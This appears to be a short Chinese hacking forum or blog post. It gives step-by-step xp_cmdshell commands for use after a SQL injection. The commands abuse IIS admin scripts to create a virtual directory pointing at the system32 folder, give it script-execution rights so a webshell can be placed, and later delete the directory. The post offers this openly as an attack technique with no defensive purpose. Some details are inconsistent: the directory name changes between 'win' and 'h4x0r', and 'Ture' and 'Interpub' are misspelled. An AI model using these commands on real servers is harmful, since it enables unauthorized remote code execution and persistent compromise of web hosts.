我們很多情況下都遇到SQL注入可以列目錄和運行命令，但是卻很不容易找到web所在目錄，也就不好得到一個webshell，這一招不錯： 

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 
建立虛擬目錄win,指向c:\winnt\system32 
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture' 
讓win句有解析asp腳本權(quán)限 

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/" 
刪除虛擬目錄。 
找不到web絕對路徑的一種解決辦法， 

http://21o.net/h4x0r 
403錯誤，表示虛擬目錄建好了。。。  

最新評論